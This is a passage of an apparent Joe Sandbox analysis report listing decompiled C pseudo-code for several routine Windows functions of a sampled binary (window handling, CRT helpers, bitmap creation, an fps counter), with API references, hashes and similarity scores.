				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageW( *(_t18 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}








                  0x0040e7ca
                  0x0040e7d6
                  0x0040e81e
                  0x0040e820
                  0x0040e827
                  0x00000000
                  0x0040e829
                  0x0040e7dd
                  0x0040e7e1
                  0x00000000
                  0x0040e804
                  0x0040e813
                  0x00000000
                  0x0040e81b

                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetKeyState.USER32(00000010), ref: 0040E7EB
                  • GetKeyState.USER32(00000011), ref: 0040E7F4
                  • GetKeyState.USER32(00000012), ref: 0040E7FD
                  • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 0040E813
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: State$LongMessageSendWindow
                  • String ID:
                  • API String ID: 1063413437-0
                  • Opcode ID: b14e449ed1ac78b9afd043711f071687e1a71c384ee17283a8b7ebd64535a622
                  • Instruction ID: 639cc1c9fc91c349acb62a99410e12bf1356db3b5280d1427a52c6ec7a751173
                  • Opcode Fuzzy Hash: b14e449ed1ac78b9afd043711f071687e1a71c384ee17283a8b7ebd64535a622
                  • Instruction Fuzzy Hash: B4F0E93778024B65EA1433735D41FA6051D4FD1B94F00887BBB41FB1D2CEB9C8225278
                  Uniqueness

                  Uniqueness Score: 0.22%

                  Function 0041EDAB, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041EDAB() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E00411E6E(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E0041E7F4(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E00429303(_t16);
			}








                  0x0041edab
                  0x0041edae
                  0x0041edb6
                  0x0041edbc
                  0x0041edbc
                  0x0041edc4
                  0x0041edcb
                  0x0041edcb
                  0x0041edd4
                  0x0041edd6
                  0x0041eddc
                  0x0041eddf
                  0x0041ede4
                  0x0041ede4
                  0x0041eddf
                  0x0041edee
                  0x0041edf3
                  0x0041edfb
                  0x0041ee00
                  0x0041ee00
                  0x0041ee06
                  0x0041ee0e

                  APIs
                  • EnableWindow.USER32(?,00000001), ref: 0041EDCB
                  • GetActiveWindow.USER32 ref: 0041EDD6
                  • SetActiveWindow.USER32(?), ref: 0041EDE4
                  • FreeResource.KERNEL32(?,?,00000024,004089A8,A6E2BCA1), ref: 0041EE00
                    • Part of subcall function 00411E6E: EnableWindow.USER32(?,004089A8), ref: 00411E7F
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ActiveEnable$FreeResource
                  • String ID:
                  • API String ID: 253586258-0
                  • Opcode ID: c5dfa83998e512c3ae3c0afcd2ddafaa279c748f79a69e55e46fa9fa3313f848
                  • Instruction ID: 5c12bbb04d1fb0c27aff0666e5c059b09eba9b74898f31bf398d5a6be09069d2
                  • Opcode Fuzzy Hash: c5dfa83998e512c3ae3c0afcd2ddafaa279c748f79a69e55e46fa9fa3313f848
                  • Instruction Fuzzy Hash: A7F04F34A00615CBCF21EFA6D8495EEB7B1BF48701F60002AF842726A0CB3A5D80CF5A
                  Uniqueness

                  Uniqueness Score: 0.33%

                  Function 0042FF8E, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0042FF8E(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x447ea8);
				E00429338(__ebx, __edi, __esi);
				_t28 = E0042C35A(__ebx, __edx, __edi, _t30);
				_t13 =  *0x44ccb4; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0042EACE(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x44cd98; // 0x44ccc0
					 *((intOrPtr*)(_t29 - 0x1c)) = E0042FF50(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0042FFF8();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0042C35A(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0042AEA5(_t25, _t26, 0x20);
				}
				return E0042937D(_t28);
			}







                  0x0042ff8e
                  0x0042ff8e
                  0x0042ff8e
                  0x0042ff8e
                  0x0042ff8e
                  0x0042ff90
                  0x0042ff95
                  0x0042ff9f
                  0x0042ffa1
                  0x0042ffa9
                  0x0042ffcd
                  0x0042ffcf
                  0x0042ffd5
                  0x0042ffd9
                  0x0042ffdc
                  0x0042ffe7
                  0x0042ffea
                  0x0042fff1
                  0x0042ffab
                  0x0042ffab
                  0x0042ffaf
                  0x00000000
                  0x0042ffb1
                  0x0042ffb6
                  0x0042ffb6
                  0x0042ffaf
                  0x0042ffbb
                  0x0042ffbf
                  0x0042ffc4
                  0x0042ffcc

                  APIs
                  • __getptd.LIBCMT ref: 0042FF9A
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042FFB1
                  • __amsg_exit.LIBCMT ref: 0042FFBF
                  • __lock.LIBCMT ref: 0042FFCF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: e1ecb3947682229d40f281b1ed529bcad6822fc2fbce17ebfb16c39304c082ec
                  • Instruction ID: 8321333d5718c6a74650dd4cb1a3f6632f3304fd945d83625efb1a9cd81b86e1
                  • Opcode Fuzzy Hash: e1ecb3947682229d40f281b1ed529bcad6822fc2fbce17ebfb16c39304c082ec
                  • Instruction Fuzzy Hash: CBF0C232B407308BD320FB66A50275D73B06F45718FD6453FE815572C2DB3C58068A9D
                  Uniqueness

                  Uniqueness Score: 0.07%

                  Function 00402D00, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00402D00(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, long _a4, signed int _a8, intOrPtr _a12, char _a16, intOrPtr _a20, signed int _a24) {
				BITMAPINFO* _v8;
				char _v12;
				struct HBITMAP__* _v16;
				signed int _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				void** _v40;
				void** _v44;
				signed int _t65;
				struct HDC__* _t80;
				intOrPtr _t89;
				intOrPtr* _t111;
				intOrPtr _t119;
				intOrPtr _t120;
				signed int _t121;
				void** _t122;

				_t120 = __esi;
				_t119 = __edi;
				_t89 = __ebx;
				_t65 =  *0x44c364; // 0xa6e2bca1
				_v20 = _t65 ^ _t121;
				_v36 = __ecx;
				E00404730( &_v12);
				if(0 == 0) {
					_v44 = E00404750( &_v12, 0, 0x428);
				} else {
					E00427EA0(0x428);
					_v40 = _t122;
					_t116 = _v40;
					_v44 = _v40;
				}
				_v8 = _v44;
				if(_v8 != 0) {
					_t111 = _v8;
					 *_t111 = 0;
					 *((intOrPtr*)(_t111 + 4)) = 0;
					 *((intOrPtr*)(_t111 + 8)) = 0;
					 *((intOrPtr*)(_t111 + 0xc)) = 0;
					 *((intOrPtr*)(_t111 + 0x10)) = 0;
					 *((intOrPtr*)(_t111 + 0x14)) = 0;
					 *((intOrPtr*)(_t111 + 0x18)) = 0;
					 *((intOrPtr*)(_t111 + 0x1c)) = 0;
					 *((intOrPtr*)(_t111 + 0x20)) = 0;
					 *((intOrPtr*)(_t111 + 0x24)) = 0;
					_v8->bmiHeader = 0x28;
					_v8->bmiHeader.biWidth = _a4;
					_v8->bmiHeader.biHeight = _a8;
					_v8->bmiHeader.biPlanes = 1;
					_v8->bmiHeader.biBitCount = _a12;
					_t38 =  &_a16; // 0x402467
					_v8->bmiHeader.biCompression =  *_t38;
					__eflags = _a12 - 8;
					if(_a12 > 8) {
						__eflags = _a16 - 3;
						if(_a16 == 3) {
							__eflags =  &(_v8->bmiColors);
							E00402850(_t89,  &(_v8->bmiColors), 0xc, _a20, 0xc);
						}
					} else {
						E004281D0(_t119,  &(_v8->bmiColors), 0, 0x400);
					}
					_t116 = _v36 + 8;
					_v16 = CreateDIBSection(0, _v8, 0, _v36 + 8, 0, 0);
					__eflags = _v16;
					if(_v16 != 0) {
						__eflags = _a8;
						_t116 = _v16;
						E00402E90(_v36, _v16, (0 | _a8 >= 0x00000000) + 1);
						__eflags = _a24 & 0x00000001;
						if((_a24 & 0x00000001) != 0) {
							 *((char*)(_v36 + 0x1d)) = 1;
						}
						_v32 = 1;
						E004047C0( &_v12);
						_t80 = _v32;
					} else {
						_v28 = 0;
						E004047C0( &_v12);
						_t80 = _v28;
					}
				} else {
					_v24 = 0;
					E004047C0( &_v12);
					_t80 = _v24;
				}
				return E00427DFF(_t80, _t89, _v20 ^ _t121, _t116, _t119, _t120);
			}





















                  0x00402d00
                  0x00402d00
                  0x00402d00
                  0x00402d06
                  0x00402d0d
                  0x00402d10
                  0x00402d16
                  0x00402d1d
                  0x00402d41
                  0x00402d1f
                  0x00402d24
                  0x00402d29
                  0x00402d2c
                  0x00402d2f
                  0x00402d2f
                  0x00402d47
                  0x00402d4e
                  0x00402d69
                  0x00402d6c
                  0x00402d6e
                  0x00402d71
                  0x00402d74
                  0x00402d77
                  0x00402d7a
                  0x00402d7d
                  0x00402d80
                  0x00402d83
                  0x00402d86
                  0x00402d8c
                  0x00402d98
                  0x00402da1
                  0x00402dac
                  0x00402db7
                  0x00402dbe
                  0x00402dc1
                  0x00402dc4
                  0x00402dc8
                  0x00402de2
                  0x00402de6
                  0x00402df3
                  0x00402df7
                  0x00402dfc
                  0x00402dca
                  0x00402dd8
                  0x00402ddd
                  0x00402e06
                  0x00402e18
                  0x00402e1b
                  0x00402e1f
                  0x00402e37
                  0x00402e42
                  0x00402e49
                  0x00402e51
                  0x00402e54
                  0x00402e59
                  0x00402e59
                  0x00402e5d
                  0x00402e67
                  0x00402e6c
                  0x00402e21
                  0x00402e21
                  0x00402e2b
                  0x00402e30
                  0x00402e30
                  0x00402d50
                  0x00402d50
                  0x00402d5a
                  0x00402d5f
                  0x00402d5f
                  0x00402e7f

                  APIs
                  • _memset.LIBCMT ref: 00402DD8
                  • CreateDIBSection.GDI32(00000000,00000000,00000000,?,00000000,00000000), ref: 00402E12
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CreateSection_memset
                  • String ID: g$@
                  • API String ID: 3331753385-904766593
                  • Opcode ID: 4ae03dac6010e9f9ce23c08c8af6f5d921b51c74caf8ea4115b7d6a60648d521
                  • Instruction ID: 67b4cf65f91f9f87da93a940c7db3ce806c9c1e06d94f226ac78e2ea5b2d001c
                  • Opcode Fuzzy Hash: 4ae03dac6010e9f9ce23c08c8af6f5d921b51c74caf8ea4115b7d6a60648d521
                  • Instruction Fuzzy Hash: 0751F7B4A00209DFDB08DF94D945BAEB7B1FF48304F1081AEE905AB381D7799E41CB99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00404340, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 64%
                  			E00404340(intOrPtr __ecx, intOrPtr* _a4) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				signed int _t42;
				intOrPtr _t45;
				signed int _t91;

				_push(0xffffffff);
				_push(E00438618);
				_push( *[fs:0x0]);
				_t42 =  *0x44c364; // 0xa6e2bca1
				_push(_t42 ^ _t91);
				 *[fs:0x0] =  &_v16;
				_v28 = __ecx;
				_t45 = _v28;
				if(( *(_t45 + 0xa3) & 0x000000ff) != 0) {
					if( *((intOrPtr*)(_v28 + 0x9c)) + 1 <= GetTickCount()) {
						_v32 = GetTickCount();
					} else {
						_v32 =  *((intOrPtr*)(_v28 + 0x9c)) + 1;
					}
					_v20 = _v32;
					E00404820( &_v24);
					_v8 = 0;
					E00406200(_v28,  &_v24, L"%d fps",  *(_v28 + 0x90) * 0x3e8 / (_v20 -  *((intOrPtr*)(_v28 + 0x9c))));
					 *(_v28 + 0x90) = 0;
					 *((char*)(_v28 + 0xa3)) = 0;
					 *((intOrPtr*)(_v28 + 0x9c)) = _v20;
					 *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0xc))))(E0040A540( &_v24));
					 *((intOrPtr*)( *((intOrPtr*)( *_a4))))(1);
					_v8 = 0xffffffff;
					_t45 = E00404840( &_v24);
				}
				 *[fs:0x0] = _v16;
				return _t45;
			}












                  0x00404343
                  0x00404345
                  0x00404350
                  0x00404355
                  0x0040435c
                  0x00404360
                  0x00404366
                  0x00404369
                  0x00404375
                  0x00404390
                  0x004043a9
                  0x00404392
                  0x0040439e
                  0x0040439e
                  0x004043af
                  0x004043b5
                  0x004043ba
                  0x004043ea
                  0x004043f5
                  0x00404402
                  0x0040440f
                  0x00404429
                  0x00404437
                  0x00404439
                  0x00404443
                  0x00404443
                  0x0040444b
                  0x00404457

                  APIs
                  • GetTickCount.KERNEL32(A6E2BCA1), ref: 00404388
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CountTick
                  • String ID: %d fps
                  • API String ID: 536389180-2152375671
                  • Opcode ID: c98e3562372ed6184c1cdf75918ec1a9916efc4a3c57e29246a8dc7e3e92f718
                  • Instruction ID: da02ad8ad525afd95a6f7c226670372c76d7a46a3731ce3ec8567c968113651e
                  • Opcode Fuzzy Hash: c98e3562372ed6184c1cdf75918ec1a9916efc4a3c57e29246a8dc7e3e92f718
                  • Instruction Fuzzy Hash: BC313CB5E00209DFCB04DFA4C891BAEBBB4FF48314F14827AE915AB381DB356910CB95
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004333B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004333B3() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x451900; // 0x200
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x451900 = _t5;
				}
				_t6 = E004313D0(_t5, 4);
				 *0x4508f4 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x44cf10;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x44d190) {
							break;
						}
						_t6 =  *0x4508f4; // 0x5111f8
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x44cf20;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x451940 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x44cf80);
					return 0;
				} else {
					 *0x451900 = _t26;
					_t6 = E004313D0(_t26, 4);
					 *0x4508f4 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                  0x004333b3
                  0x004333bb
                  0x004333be
                  0x004333c9
                  0x004333cb
                  0x00000000
                  0x004333cb
                  0x004333c0
                  0x004333c0
                  0x004333cd
                  0x004333cd
                  0x004333cd
                  0x004333d5
                  0x004333dc
                  0x004333e3
                  0x00433403
                  0x00433403
                  0x00433405
                  0x00433411
                  0x00433411
                  0x00433414
                  0x00433417
                  0x00433420
                  0x00000000
                  0x00000000
                  0x0043340c
                  0x0043340c
                  0x00433424
                  0x00433425
                  0x00433427
                  0x0043342d
                  0x00433441
                  0x00433447
                  0x00433451
                  0x00433451
                  0x00433453
                  0x00433456
                  0x00433457
                  0x00433463
                  0x004333e5
                  0x004333e8
                  0x004333ee
                  0x004333f5
                  0x004333fc
                  0x00000000
                  0x004333fe
                  0x00433400
                  0x00433402
                  0x00433402
                  0x004333fc

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: )D
                  • API String ID: 3494438863-3519450878
                  • Opcode ID: 46783755bb5589b1fd7b314107bed779d8feeaa8a0b879c0f75682da3c7f792a
                  • Instruction ID: 62831267753a0faca5757da0ee1d5cad5b09ba4edb5ffdd6bfde8f40ebd97cf1
                  • Opcode Fuzzy Hash: 46783755bb5589b1fd7b314107bed779d8feeaa8a0b879c0f75682da3c7f792a
                  • Instruction Fuzzy Hash: 7E1136717053114BF7198F2EBC50A662781E75C766F28A13BE911CA3E1E73CDD41864C
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0042755E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042755E(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t26;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				void* _t40;
				intOrPtr _t41;
				signed int _t42;
				void* _t43;

				_t39 = __ecx;
				_t43 = __ecx;
				_t26 = E00420870(_t36, __ecx, _t40, __ecx, __eflags);
				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
				if(_a4 != 0) {
					_t42 = _a8;
					__eflags =  *(__ecx + 0x3c) & _t42;
					if(__eflags == 0) {
						 *((intOrPtr*)(E0042083D(_t36, _t42, __ecx, __eflags) + 0x38)) = E0042754A;
						_t24 = _t43 + 0x3c;
						 *_t24 =  *(_t43 + 0x3c) | _t42;
						__eflags =  *_t24;
					}
				} else {
					_t37 = _a8;
					if(( *(__ecx + 0x3c) & _t37) != 0) {
						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
							E0040CE8F(_t39, _t49, 1);
						}
						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
							_t9 =  &_v52; // 0x427609
							E004281D0(_t41, _t9, 0, 0x30);
							_t10 = _t43 + 0x20; // 0x69614d43
							_t32 =  *_t10;
							_v44 = _t32;
							_v40 = _t32;
							_t13 =  &_v52; // 0x427609
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageW( *(_t41 + 0x20), 0x433, 0, _t13);
						}
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
					}
				}
				return 1;
			}



















                  0x0042755e
                  0x00427569
                  0x0042756b
                  0x00427574
                  0x00427577
                  0x004275d9
                  0x004275dc
                  0x004275df
                  0x004275e6
                  0x004275ed
                  0x004275ed
                  0x004275ed
                  0x004275ed
                  0x00427579
                  0x00427579
                  0x0042757f
                  0x00427581
                  0x00427584
                  0x00427588
                  0x00427588
                  0x0042758f
                  0x00427599
                  0x0042759f
                  0x004275a4
                  0x004275a4
                  0x004275aa
                  0x004275ad
                  0x004275b0
                  0x004275be
                  0x004275c5
                  0x004275cc
                  0x004275cc
                  0x004275d4
                  0x004275d4
                  0x0042757f
                  0x004275f7

                  APIs
                  • _memset.LIBCMT ref: 0042759F
                  • SendMessageW.USER32(00000000,00000433,00000000,vB), ref: 004275CC
                    • Part of subcall function 0040CE8F: SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0040CEB4
                    • Part of subcall function 0040CE8F: GetKeyState.USER32(00000001), ref: 0040CEC9
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset
                  • String ID: vB
                  • API String ID: 930327405-287775825
                  • Opcode ID: e00bc0403366f843f962d3f9cb5925ce717f5713c5d4694d713f9483bd179dd1
                  • Instruction ID: 38700b3e523bd68fc6ef8c7ceb28b79eb1def088a02d9e1330878266763ba470
                  • Opcode Fuzzy Hash: e00bc0403366f843f962d3f9cb5925ce717f5713c5d4694d713f9483bd179dd1
                  • Instruction Fuzzy Hash: A311E271604314AFD720DFA2E881B9BB7B4FF50324F84901FE54596A41E7B8A880CF99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041D363, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 55%
                  			E0041D363(void* __ecx) {
				signed int _v8;
				char _v28;
				short _v548;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				long _t12;
				short _t13;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t30;
				signed int _t35;

				_t33 = _t35;
				_t9 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t9 ^ _t35;
				_t12 = GetModuleFileNameW( *(__ecx + 0x44),  &_v548, 0x104);
				if(_t12 == 0) {
					L4:
					_t13 = 0;
					__eflags = 0;
				} else {
					_t39 = _t12 - 0x104;
					if(_t12 == 0x104) {
						goto L4;
					} else {
						 *(PathFindExtensionW( &_v548)) = 0;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t13 = E0041D0F2(_t19,  &_v28, L"%s%s.dll", _t39,  &_v28,  &_v548);
						_t26 = _t26;
					}
				}
				_pop(_t30);
				return E00427DFF(_t13, _t19, _v8 ^ _t33, _t25, _t26, _t30);
			}

















                  0x0041d366
                  0x0041d36e
                  0x0041d375
                  0x0041d38b
                  0x0041d393
                  0x0041d3cd
                  0x0041d3cd
                  0x0041d3cd
                  0x0041d395
                  0x0041d395
                  0x0041d397
                  0x00000000
                  0x0041d399
                  0x0041d3a9
                  0x0041d3b4
                  0x0041d3b5
                  0x0041d3b6
                  0x0041d3bd
                  0x0041d3c3
                  0x0041d3c5
                  0x0041d3ca
                  0x0041d3ca
                  0x0041d397
                  0x0041d3d4
                  0x0041d3db

                  APIs
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 0041D38B
                  • PathFindExtensionW.SHLWAPI(?), ref: 0041D3A1
                    • Part of subcall function 0041D0F2: __EH_prolog3_GS.LIBCMT ref: 0041D0FC
                    • Part of subcall function 0041D0F2: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,0041D3CA,?,?), ref: 0041D12C
                    • Part of subcall function 0041D0F2: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0041D140
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(?), ref: 0041D17C
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(?), ref: 0041D18A
                    • Part of subcall function 0041D0F2: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0041D1A7
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(?), ref: 0041D1D2
                    • Part of subcall function 0041D0F2: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041D1DB
                    • Part of subcall function 0041D0F2: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041D292
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                  • String ID: %s%s.dll
                  • API String ID: 1311856149-1649984862
                  • Opcode ID: b704c26b5200b5af27fe3e1943deedd6ed109bb7a919092fb28a7fe84f45fdf1
